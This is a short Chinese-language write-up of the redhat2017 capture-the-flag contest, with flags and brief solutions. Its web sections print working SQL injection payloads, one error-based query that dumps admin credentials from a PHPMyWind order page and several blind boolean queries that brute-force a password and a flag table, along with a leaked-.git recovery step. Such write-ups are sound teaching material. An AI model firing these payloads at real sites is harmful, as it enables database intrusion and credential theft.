redhat2017_Writeup

From ChaMd5安全团队核心成员 Lncken

MISC签到

flag{BE78989E-1F00-8326-11AD-590B23F48AB3}

CRYPTO brian(Y)

Brainfuck解密（那个魔法棒公众号推送的https://www.splitbrain.org/services/ook）

flag{e676600a-06b4-4a20-b159-d5654415d0c3}

WEB 刮刮乐

刮开发现提示是信息泄露，想到源码泄露

扫描一下目录，果然存在git泄露

于是利用githack工具拿到flag.php

getflag

WEB PHPMYWIND

在http://106.75.67.7:3089/order.php?action=getarea进行注入

datagroup=123&areaval=500%20and%20@`'`%20UnIon%20select%20username%20from%20`pmw_admin`%20where%20(select%201%20from%20(select%20count(*)%20,concat(0x7c,(select%20concat(username,0x3a,password)%20from%20pmw_admin%20limit%200,1),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20id=@`'`&level=1

4027875a97a7787b9032ea46dae45d05

解出来666888

在文件管理有一个文件flag.txt

（PS：在修复以前，应该是这样的吧？）

WEB 后台

包含了一个hint，看到这个基本就解出来了吧

Username是admin，password猜测是今天20170506，getflag

WEB thinkseeker

本题一直连不上，导致只能熬到深夜再做

在index.php~可以发现源码

发现过滤了这些字段

主要针对这个过程进行注入

需要传token=21232f297a57a5a743894a0e4a801fc3为MD5(“admin”)的值

写一个 爆破脚本

然后针对第一个sql语句注入爆破password：

http://106.75.117.4:3083/?userid=-1||(ascii(mid((flag)from(%d)))=%d)&password=1&token=21232f297a57a5a743894a0e4a801fc3

然后用得到的password进入第二个sql语句：

根据提示，注入发现还有一个flag表：

http://106.75.117.4:3083/?userid=1&password=219d03ad2d752ad2806ea1de18613158&token=21232f297a57a5a743894a0e4a801fc3&infoid=1||(select/**/count(1)/**/from/**/flag)>1

对flag表进行爆破flag字段：

http://106.75.117.4:3083/?userid=1&password=219d03ad2d752ad2806ea1de18613158&token=21232f297a57a5a743894a0e4a801fc3&infoid=-1||(ascii(mid((select(flag)from(flag))from(%d)))=%d)

getflag flag{71fb58931b330a83eba9b25e40ac437a}

PWN1

PWN2

PWN3

PWM4

PWN5

表示我真的其实很懒2333333333

不过第二也是很满足了